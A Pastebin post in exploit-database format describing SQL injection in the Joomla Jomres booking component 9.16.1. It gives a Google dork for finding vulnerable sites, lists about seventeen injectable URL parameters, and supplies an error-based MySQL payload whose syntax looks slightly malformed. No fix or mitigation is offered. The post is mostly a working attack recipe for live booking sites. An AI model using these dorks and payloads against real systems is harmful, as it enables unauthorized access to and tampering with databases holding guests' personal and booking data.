Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla Jomres Components 9.16.1 SQL Injection
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_jomres''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- ####################################################################
- # Description about Software :
- ***************************
- The Complete Online Booking and Property Management Solution.
- Jomres is the first and most complete online booking toolkit for Joomla.
- Jomres is the most powerful, commission-free Joomla and
- WordPress online booking system and property management solution.
- ####################################################################
- # Impact :
- ***********
- Joomla Jomres 9.16.1 component for Joomla and other versions is prone to an SQL-injection
- vulnerability because it fails to sufficiently sanitize user-supplied
- data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_jomres&Itemid=[SQL Injection]
- /index.php?option=com_jomres&Itemid=[ID-NUMBER]&tmpl=component&task=[SQL Injection]
- /index.php?option=com_jomres&lang=es&task=viewproperty&property_uid=[SQL Injection]
- /index.php?option=com_jomres&Itemid=[ID-NUMBER]&task=viewproperty&property_uid=[SQL Injection]
- /index.php?option=com_jomres&Itemid=[ID-NUMBER]&task=ajax_comentarii&Itemid=[ID-NUMBER]&property_uid=[SQL Injection]
- /index.php?option=com_jomres&Itemid=[ID-NUMBER]&task=ajax_comentarii&Itemid=[ID-NUMBER]&property_uid=[SQL Injection]&tmpl=kiss&lang=us
- /index.php?option=com_jomres&Itemid=[ID-NUMBER]&lang=es&task=listProperties&propertylist_layout=mapview
- /index.php?option=com_jomres&Itemid=[ID-NUMBER]&lang=nl&task=dobooking&selectedProperty=[SQL Injection]
- /index.php?option=com_jomres&tmpl=component&jrajax=[ID-NUMBER]&no_html=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_jomres&Itemid=[ID-NUMBER]&lang=es&task=showRoomDetails&roomUid=[SQL Injection]
- /index.php?option=com_jomres&Itemid=[ID-NUMBER]&lang=en&task=viewproperty&property_uid=[SQL Injection]
- /index.php?option=com_jomres&Itemid=[ID-NUMBER]&lang=en&task=showTariffs&property_uid=1&op=[SQL Injection]
- /index.php?option=com_jomres&Itemid=[ID-NUMBER]&lang=en&send=Search&calledByModule=mod_jomsearch_m0&town=[SQL Injection]
- /index.php?option=com_jomres&Itemid=[ID-NUMBER]&tmpl=component&lang=en&task=showRoomsListing&property_uid=[ID-NUMBER]&op=[SQL Injection]
- /index.php?option=com_jomres&page_id=[ID-NUMBER]&tmpl=jomres&lang=en&task=viewproperty&jr_printable=[ID-NUMBER]&popup=[ID-NUMBER]&tmpl=jomres&property_uid=[SQL Injection]
- /index.php?option=com_jomres&arrivalDate=&departureDate=&ptype=[ID-NUMBER]&guestnumber=[ID-NUMBER]&calledByModule=mod_jomsearch_m3&Itemid=[SQL Injection]
- /index.php?option=com_jomres&town=Esfahan&guestnumber=0&send=Recherche&nodates=[ID-NUMBER]&calledByModule=mod_jomsearch_m1&Itemid=[SQL Injection]
- # Example SQL Injection Exploit Payload :
- **************************************
- 82' AND (SELECT 8845 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71
- ,(SELECT #(ELT(8845=8845,1))),0x716a717a71,FLOOR(RAND(0)*2))
- x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--
- ####################################################################
- Please Follow Me On Instagram: @shubhamyadav2468
- ####################################################################
Add Comment
Please, Sign In to add comment